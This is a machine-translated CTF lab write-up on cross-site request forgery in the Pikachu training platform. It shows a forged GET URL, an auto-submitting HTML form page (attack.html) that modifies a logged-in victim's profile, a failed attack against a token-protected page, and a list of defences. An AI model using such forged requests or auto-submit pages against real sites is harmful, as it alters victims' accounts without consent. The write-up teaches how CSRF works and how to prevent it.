ctf-pikachu-CSRF

CSRF（ Cross-site request forgery ,cross-site request forgery）

principle ： The attacker faked a request （ This request is usually a link ）, Then deceive the target user to click , Once the user clicks on the request , The whole attack is done . So it's also called “one-click” attack .

The premise of successful attack ：

1.  The website does not prevent certain requests CSRF Attack to deal with , This makes the request vulnerable to forgery .
2.  When the user logs in the background , Click on the forged link 

CSRF And XSS difference ：

XSS： Directly use the permissions of the target user to attack （ Like stealing cookie, Then log in directly and smoothly to the background of the target user to modify the information ）.
CSRF： Use the authority of the target user to attack （ For example, forge links , But you need the target user to click to modify the information ）.

 summary ：XSS Generally, you can get user permissions ;CSRF Didn't get user permission . Generally speaking, these two attacks are not very relevant , But it is easy to be confused .

How to determine the existence of CSRF Loophole ：

1.  Mark the addition, deletion and modification of the target website , And observe its logic , Determine whether the request can be forged .
-- For example, when modifying the administrator account , There is no need to verify the old password , It makes the request easy to be forged .
-- For example, the modification of sensitive information does not use secure token verification , It makes the request easy to be forged .

2.  Confirm the validity period of the voucher （ This problem will improve CSRF The probability of being used ）
-- Although I quit or closed the browser , but cookie Still valid , perhaps session It didn't expire in time , Lead to CSRF The attack becomes simple 

1.CSRF（get）

The attacker ：allen
The victim ：lucy

1. To modify lucy Personal information ,allen First, you need to register an account on the website .
   –pikachu There are already several accounts on the platform , We log in directly allen The backstage of .
   

2. Sign in allen Backstage , Click modify personal information , Change the address to shanxi, Click on submit.（ Note that it needs to be opened when clicking burpsuite）
   

3. Now open burpsuite Carry out the bag , open Proxy Modular HTTP history, It is found that the packet just modified has been caught .
   

4. We copy the packet , It is found that there is no token Etc , Therefore, we judge that the webpage is not safe token verification , Therefore exist CSRF Loophole .

   Forge the data package completely ：

    http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=13676767767&add=shanxi&email=allen%40pikachu.com&submit=submit 
   

5. Send this packet to those who have logged in to the background lucy, Entice them to click .
   
   

6. Find out lucy Your personal information has been completely modified to allen Specified information .
   

2.CSRF（post）

You need to build a site by yourself , Then design a form in the web page , Re seduce lucy Click on .

The attacker ：allen
The victim ：lucy

1. Construct malicious web pages attack.html

<html>
<head>
<script>
window.onload = function() {
    
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="[email protected]" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
————————————————
 Copyright notice ： This paper is about CSDN Blogger 「witwitwiter」 The original article of , follow CC 4.0 BY-SA Copyright agreement , For reprint, please attach the original source link and this statement .
 Link to the original text ：https://blog.csdn.net/witwitwiter/article/details/115835156

2. Send malicious web pages to login lucy, And entice it to click .

    http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/attack.html
   

3. Successful attack
   

3.CSRF（token）

token How to prevent CSRF Of ： because CSRF The main problem is that the links of sensitive operations are easy to be forged , and token Will make the link not easy to be forged .

The specific methods ：

 Each request , Add a random code （ It needs to be random enough , Not easy to be forged ）, The background verifies this random code every time . The random code is called token. Because the random code is not easy to construct , Therefore, the request is not easy to be forged .

The attacker ：allen
The victim ：lucy

1. Log in to the attacker's background , Modify the information , Capture and forge .
   
   

2. Find out url Contain token, We also construct malicious according to the previous method url. And induce login lucy Click on .

    http://127.0.0.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php?sex=boy&phonenum=13676767767&add=hunan&email=allen%40pikachu.com&token=8736162bbc554bfcf4687190416&submit=submit
   

3. Found that the attack failed , The error message obtained is token Value inequality .
   

summary

CSRF The root cause of the leak is ： Requests are easy to forge .

Preventive measures ：

1.  increase token verification （ Common practice ）： Add... To key operations token Parameters ,token The value must be random , It's different every time 
2.  About secure session management （ Avoid sessions being used ）：
（1） Do not save sensitive information on the client （ For example, identity authentication information ）
（2） The test is closed directly , Exit time , Expiration mechanism of session 
（3） Set the session expiration mechanism , such as 15 Misoperation within minutes , Then the automatic login timeout .
3.  Access control security management ：
（1） The modification of sensitive information requires secondary authentication of identity , For example, when modifying the account number , Need to judge the old password .
（2） Modification of sensitive information post, instead of get
（3） adopt http The head of the referer To limit the original page 
4.  Add verification code ： Generally used to log in （ Anti violent cracking ）, It can also be used in other important information operation forms （ Need to consider availability ）